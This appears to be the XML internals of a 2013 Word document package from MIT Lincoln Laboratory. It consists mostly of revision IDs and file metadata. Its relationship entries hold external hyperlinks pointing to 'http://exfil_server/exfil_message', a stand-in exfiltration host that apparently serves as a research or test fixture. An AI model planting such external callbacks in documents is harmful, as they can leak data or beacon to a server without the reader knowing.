    <w:rsid w:val="0064666E"/>
    <w:rsid w:val="00646FC6"/>
    <w:rsid w:val="00652B8E"/>
    <w:rsid w:val="006605DF"/>
    <w:rsid w:val="006659D8"/>
    <w:rsid w:val="0066639D"/>
    <w:rsid w:val="00686C09"/>
    <w:rsid w:val="00687AE4"/>
    <w:rsid w:val="00692452"/>
    <w:rsid w:val="006A2AB5"/>
    <w:rsid w:val="006B16D1"/>
    <w:rsid w:val="006B412D"/>
    <w:rsid w:val="006B5FAE"/>
    <w:rsid w:val="006C1799"/>
    <w:rsid w:val="006C41A1"/>
    <w:rsid w:val="006C426A"/>
    <w:rsid w:val="006C6EDD"/>
    <w:rsid w:val="006D28DE"/>
    <w:rsid w:val="00704117"/>
    <w:rsid w:val="00713A18"/>
    <w:rsid w:val="00716F92"/>
    <w:rsid w:val="00727006"/>
    <w:rsid w:val="00727BD2"/>
    <w:rsid w:val="00730367"/>
    <w:rsid w:val="00743C0D"/>
    <w:rsid w:val="00770916"/>
    <w:rsid w:val="00780CF1"/>
    <w:rsid w:val="00786C5B"/>
    <w:rsid w:val="00790A7B"/>
    <w:rsid w:val="007969F9"/>
    <w:rsid w:val="007C3CC0"/>
    <w:rsid w:val="007E1606"/>
    <w:rsid w:val="007E2B8E"/>
    <w:rsid w:val="007E784A"/>
    <w:rsid w:val="007F6AC7"/>
    <w:rsid w:val="00846F5F"/>
    <w:rsid w:val="0085342B"/>
    <w:rsid w:val="00853561"/>
    <w:rsid w:val="00871BCC"/>
    <w:rsid w:val="00893432"/>
    <w:rsid w:val="00895C86"/>
    <w:rsid w:val="00895D0A"/>
    <w:rsid w:val="008A1950"/>
    <w:rsid w:val="008A6730"/>
    <w:rsid w:val="008B5F0D"/>
    <w:rsid w:val="008C455D"/>
    <w:rsid w:val="008D540B"/>
    <w:rsid w:val="008F1D23"/>
    <w:rsid w:val="00926DA4"/>
    <w:rsid w:val="00940987"/>
    <w:rsid w:val="00945401"/>
    <w:rsid w:val="009569E5"/>
    <w:rsid w:val="0096390F"/>
    <w:rsid w:val="0097147C"/>
    <w:rsid w:val="00980440"/>
    <w:rsid w:val="00984E30"/>
    <w:rsid w:val="009851CB"/>
    <w:rsid w:val="0099407A"/>
    <w:rsid w:val="009A7F21"/>
    <w:rsid w:val="009C3E6C"/>
    <w:rsid w:val="009C7783"/>
    <w:rsid w:val="009D4667"/>
    <w:rsid w:val="009E2BC1"/>
    <w:rsid w:val="00A02FA5"/>
    <w:rsid w:val="00A108E1"/>
    <w:rsid w:val="00A13364"/>
    <w:rsid w:val="00A15960"/>
    <w:rsid w:val="00A271A3"/>
    <w:rsid w:val="00A319C2"/>
    <w:rsid w:val="00A3266C"/>
    <w:rsid w:val="00A338E7"/>
    <w:rsid w:val="00A36CDC"/>
    <w:rsid w:val="00A406AF"/>
    <w:rsid w:val="00A43F1C"/>
    <w:rsid w:val="00A4589B"/>
    <w:rsid w:val="00A53088"/>
    <w:rsid w:val="00A54325"/>
    <w:rsid w:val="00A576DD"/>
    <w:rsid w:val="00A66716"/>
    <w:rsid w:val="00A6752A"/>
    <w:rsid w:val="00A8170F"/>
    <w:rsid w:val="00A92EF5"/>
    <w:rsid w:val="00AA02AF"/>
    <w:rsid w:val="00AC0A6D"/>
    <w:rsid w:val="00AC0F49"/>
    <w:rsid w:val="00AD1259"/>
    <w:rsid w:val="00AD1786"/>
    <w:rsid w:val="00AD27CE"/>
    <w:rsid w:val="00AD6B62"/>
    <w:rsid w:val="00AE7DAC"/>
    <w:rsid w:val="00AF0167"/>
    <w:rsid w:val="00AF529B"/>
    <w:rsid w:val="00B00958"/>
    <w:rsid w:val="00B01020"/>
    <w:rsid w:val="00B01945"/>
    <w:rsid w:val="00B13CAB"/>
    <w:rsid w:val="00B15B86"/>
    <w:rsid w:val="00B16BB0"/>
    <w:rsid w:val="00B22902"/>
    <w:rsid w:val="00B2785F"/>
    <w:rsid w:val="00B36502"/>
    <w:rsid w:val="00B52D6D"/>
    <w:rsid w:val="00B52DD6"/>
    <w:rsid w:val="00B56BDB"/>
    <w:rsid w:val="00B6554C"/>
    <w:rsid w:val="00B72669"/>
    <w:rsid w:val="00B76B16"/>
    <w:rsid w:val="00B92475"/>
    <w:rsid w:val="00BA11E9"/>
    <w:rsid w:val="00BB717B"/>
    <w:rsid w:val="00BC7701"/>
    <w:rsid w:val="00BD112C"/>
    <w:rsid w:val="00BD4185"/>
    <w:rsid w:val="00C016A1"/>
    <w:rsid w:val="00C02ED7"/>
    <w:rsid w:val="00C16BAF"/>
    <w:rsid w:val="00C20442"/>
    <w:rsid w:val="00C325C7"/>
    <w:rsid w:val="00C3272B"/>
    <w:rsid w:val="00C42F88"/>
    <w:rsid w:val="00C4687D"/>
    <w:rsid w:val="00C50012"/>
    <w:rsid w:val="00C608A6"/>
    <w:rsid w:val="00C73321"/>
    <w:rsid w:val="00C86CB7"/>
    <w:rsid w:val="00C87E04"/>
    <w:rsid w:val="00C956BB"/>
    <w:rsid w:val="00CA26CA"/>
    <w:rsid w:val="00CA540D"/>
    <w:rsid w:val="00CB1EB1"/>
    <w:rsid w:val="00CC0665"/>
    <w:rsid w:val="00CC4BBA"/>
    <w:rsid w:val="00CD0CD1"/>
    <w:rsid w:val="00CE5372"/>
    <w:rsid w:val="00CE6673"/>
    <w:rsid w:val="00CF5DD3"/>
    <w:rsid w:val="00D106E0"/>
    <w:rsid w:val="00D118FC"/>
    <w:rsid w:val="00D12879"/>
    <w:rsid w:val="00D234D8"/>
    <w:rsid w:val="00D338AA"/>
    <w:rsid w:val="00D54616"/>
    <w:rsid w:val="00D821DD"/>
    <w:rsid w:val="00D92B9E"/>
    <w:rsid w:val="00D96321"/>
    <w:rsid w:val="00DA4745"/>
    <w:rsid w:val="00DA7605"/>
    <w:rsid w:val="00DA77D9"/>
    <w:rsid w:val="00DC6F22"/>
    <w:rsid w:val="00DE548A"/>
    <w:rsid w:val="00DE61DC"/>
    <w:rsid w:val="00E03C95"/>
    <w:rsid w:val="00E15EC7"/>
    <w:rsid w:val="00E232E9"/>
    <w:rsid w:val="00E26450"/>
    <w:rsid w:val="00E5415A"/>
    <w:rsid w:val="00E5604E"/>
    <w:rsid w:val="00E73762"/>
    <w:rsid w:val="00E73AD4"/>
    <w:rsid w:val="00E74535"/>
    <w:rsid w:val="00E95E2F"/>
    <w:rsid w:val="00EB115E"/>
    <w:rsid w:val="00EB6426"/>
    <w:rsid w:val="00EC45D6"/>
    <w:rsid w:val="00EC7C8F"/>
    <w:rsid w:val="00EE205E"/>
    <w:rsid w:val="00EE33B2"/>
    <w:rsid w:val="00EF32F8"/>
    <w:rsid w:val="00EF69B5"/>
    <w:rsid w:val="00EF7CE7"/>
    <w:rsid w:val="00F05575"/>
    <w:rsid w:val="00F17189"/>
    <w:rsid w:val="00F279D5"/>
    <w:rsid w:val="00F34CD7"/>
    <w:rsid w:val="00F47F7D"/>
    <w:rsid w:val="00F55A7D"/>
    <w:rsid w:val="00F81E84"/>
    <w:rsid w:val="00F93E0E"/>
    <w:rsid w:val="00F95C48"/>
    <w:rsid w:val="00FA0A1A"/>
    <w:rsid w:val="00FA23FA"/>
    <w:rsid w:val="00FA3066"/>
    <w:rsid w:val="00FB0B59"/>
    <w:rsid w:val="00FB593F"/>
    <w:rsid w:val="00FC3C44"/>
    <w:rsid w:val="00FC4311"/>
    <w:rsid w:val="00FD108E"/>
    <w:rsid w:val="00FD70A2"/>
    <w:rsid w:val="00FE3D11"/>
    <w:rsid w:val="00FE4F27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C845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4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4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0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540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540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540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5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4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5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356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4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4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4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40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0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540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540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540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540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5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4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5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356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4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xfil_server/exfil_message" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://exfil_server/exfil_messag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2525A-B984-FF46-9646-15D8E22E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67</Words>
  <Characters>5513</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>45</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>MIT Lincoln Laboratory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Maddi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Siddhartha Maddi</cp:lastModifiedBy>
  <cp:revision>420</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-08-13T20:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-08-21T19:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>